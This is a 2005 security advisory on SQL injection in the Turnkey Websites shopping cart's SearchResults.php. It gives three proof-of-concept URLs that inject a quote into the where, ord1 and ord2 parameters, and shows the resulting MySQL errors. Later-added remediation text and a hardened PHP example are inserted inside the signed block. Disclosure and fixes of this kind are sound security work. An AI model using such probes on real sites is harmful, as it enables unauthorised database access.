High severity SQL injection vulnerabilities found in Turnkey Websites shopping cart system.
`
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Dcrab's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Severity: High
Title: Multiple SQL injection vulnerabilities in Turnkey Websites: SHOPPING CART
Date: 03/04/2005
Vendor: Turnkey Websites
Vendor Website: http://www.turnkeywebsites.info/
Summary: There are multiple SQL injection vulnerabilities in Turnkey Websites: Shopping Cart. The SearchResults.php script passes the where, ord1 and ord2 request parameters straight into the query, and the resulting MySQL error messages are printed on the page.
Proof of Concept Exploits:

http://localhost/SearchResults.php?SearchTerm='SQL_INJECTION&where='SQL_INJECTION&ord1=ItemPrice&ord2=desc
SQL INJECTION
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'SQL_INJECTION like '%\'SQL_INJECTION%' order by Ite

http://localhost/SearchResults.php?SearchTerm=dcrab&where='SQL_INJECTION&ord1=&ord2=desc
SQL INJECTION
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'SQL_INJECTION like '%dcrab%' order by desc limit 0

http://localhost/SearchResults.php?SearchTerm=dcrab&where=ItemDescription&ord1=ItemPrice&ord2='SQL_INJECTION
SQL INJECTION
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'SQL INJECTION limit 0, 5' at line 7
Possible Fixes: The error output above shows the shape of the query: the where parameter is used as the column name in "<where> like '%<SearchTerm>%'", and ord1 and ord2 are placed directly after "order by", ahead of "limit 0, 5". The backslash in front of every injected quote indicates that single quotes are already being escaped before they reach the query (as magic_quotes_gpc or addslashes() would do), which is why the quote in SearchTerm stays inside the string literal while the same input in where, ord1 and ord2 still breaks the query: those three parameters are used as identifiers and keywords, not as string literals, so quote escaping with mysql_escape_string() or mysql_real_escape_string() cannot protect them. The fix is to accept where, ord1 and ord2 only from a fixed allow-list of column names and sort directions, to pass SearchTerm to the database as a bound parameter of a prepared statement (PDO or mysqli) instead of concatenating it into the query, and to stop printing raw MySQL error messages on the page, since they hand an attacker the structure of the query. htmlspecialchars() is a separate, output-side fix: it encodes data before it is echoed to the browser and does nothing for SQL. mysql_escape_string() is deprecated as of PHP 5.3 and the mysql extension itself was removed in PHP 7, so new code should not rely on it.
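A hardened version of the search query, as an added example that is not the vendor's or the advisory author's code. It reconstructs the query from the error output above ("<where> like '%<SearchTerm>%' order by <ord1> <ord2> limit 0, 5"); the table name Items, the column ItemName, and the use of PDO as the database API are assumptions, since the advisory names only ItemPrice and ItemDescription and does not say how the cart talks to MySQL. It runs stand-alone against an in-memory SQLite database filled with constructed rows; for the real cart the DSN would point at MySQL.

```php
<?php
// Added example, not the vendor's code: a hardened version of the query that
// SearchResults.php appears to build, reconstructed from the advisory's MySQL
// error output:  <where> LIKE '%<SearchTerm>%' ORDER BY <ord1> <ord2> LIMIT 0, 5
// Assumptions: table Items, column ItemName, and PDO as the database API.
declare(strict_types=1);

// Column names and sort keywords cannot be bound as query parameters, so the
// where/ord1/ord2 inputs are mapped through allow-lists instead of being
// escaped. Anything not listed is refused before any SQL is assembled.
const SEARCHABLE_COLUMNS = ['ItemName', 'ItemDescription'];
const SORTABLE_COLUMNS   = ['ItemName', 'ItemPrice'];
const SORT_DIRECTIONS    = ['asc' => 'ASC', 'desc' => 'DESC'];

/** Returns [sql, bound parameters], or throws if an identifier is not allow-listed. */
function buildSearchQuery(string $term, string $where, string $ord1, string $ord2): array
{
    if (!in_array($where, SEARCHABLE_COLUMNS, true)) {
        throw new InvalidArgumentException('unsupported search column');
    }
    if (!in_array($ord1, SORTABLE_COLUMNS, true)) {
        throw new InvalidArgumentException('unsupported sort column');
    }
    $dir = SORT_DIRECTIONS[strtolower($ord2)] ?? null;
    if ($dir === null) {
        throw new InvalidArgumentException('unsupported sort direction');
    }
    // The search term is a bound value, never concatenated. LIKE metacharacters
    // are escaped so a user cannot widen the match with % or _.
    $pattern = '%' . strtr($term, ['!' => '!!', '%' => '!%', '_' => '!_']) . '%';
    $sql = "SELECT ItemName, ItemPrice FROM Items"
         . " WHERE $where LIKE :term ESCAPE '!'"
         . " ORDER BY $ord1 $dir LIMIT 0, 5";
    return [$sql, [':term' => $pattern]];
}

function searchItems(PDO $db, string $term, string $where, string $ord1, string $ord2): array
{
    [$sql, $params] = buildSearchQuery($term, $where, $ord1, $ord2);
    $stmt = $db->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Stand-alone demo against an in-memory SQLite database with constructed rows.
// For the real cart the DSN would be mysql:host=...;dbname=..., and
// PDO::ATTR_EMULATE_PREPARES should be set to false there so that MySQL
// itself, not the PHP driver, handles parameter binding.
$db = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$db->exec('CREATE TABLE Items (ItemName TEXT, ItemDescription TEXT, ItemPrice REAL)');
$ins = $db->prepare('INSERT INTO Items VALUES (?, ?, ?)');
foreach ([['Widget', 'a dcrab-sized widget', 9.99], ['Gadget', 'no match here', 4.50]] as $row) {
    $ins->execute($row);
}

// A legitimate request from the advisory returns the matching row.
print_r(searchItems($db, 'dcrab', 'ItemDescription', 'ItemPrice', 'desc'));

// The advisory's three payloads, in the same parameter order as the URLs.
// Each is refused by the allow-list before any SQL is built, so no MySQL
// syntax error (and no hint about the query structure) reaches the page.
$payloads = [
    ["'SQL_INJECTION", "'SQL_INJECTION", 'ItemPrice', 'desc'],
    ['dcrab', "'SQL_INJECTION", '', 'desc'],
    ['dcrab', 'ItemDescription', 'ItemPrice', "'SQL_INJECTION"],
];
foreach ($payloads as [$term, $where, $ord1, $ord2]) {
    try {
        searchItems($db, $term, $where, $ord1, $ord2);
        echo "unexpectedly accepted\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected: {$e->getMessage()}\n";
    } catch (PDOException $e) {
        // Database errors are logged server-side; the user only sees a generic message.
        error_log($e->getMessage());
        echo "search unavailable\n";
    }
}
```

Saved as, say, search_fixed.php and run with the php CLI (pdo_sqlite must be enabled), the legitimate request prints the Widget row and each of the three advisory payloads prints a "rejected" line. The point of the allow-list is that where, ord1 and ord2 never reach the SQL text as user data at all; escaping them would not help, because an identifier position accepts no quoting.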
Keep yourself updated, RSS feed at: http://digitalparadox.org/rss.ah
Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com. Please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://digitalparadox.org/. Look out for my soon to come out book on secure coding with PHP.
Diabolic Crab's Security Services: Contact dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM for PHP auditing and web application securing services, along with programming in PHP, VB, ASP, C, C++, Perl, Java, HTML and graphic design.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com
iQA/AwUBQk7wkSZV5e8av/DUEQJHMwCglMZY7yi5wKzYRXO+YxxpBQN8+lwAnimE
QhGm25bVs6szjFhP7UFIxz19
=jKuM
-----END PGP SIGNATURE-----
`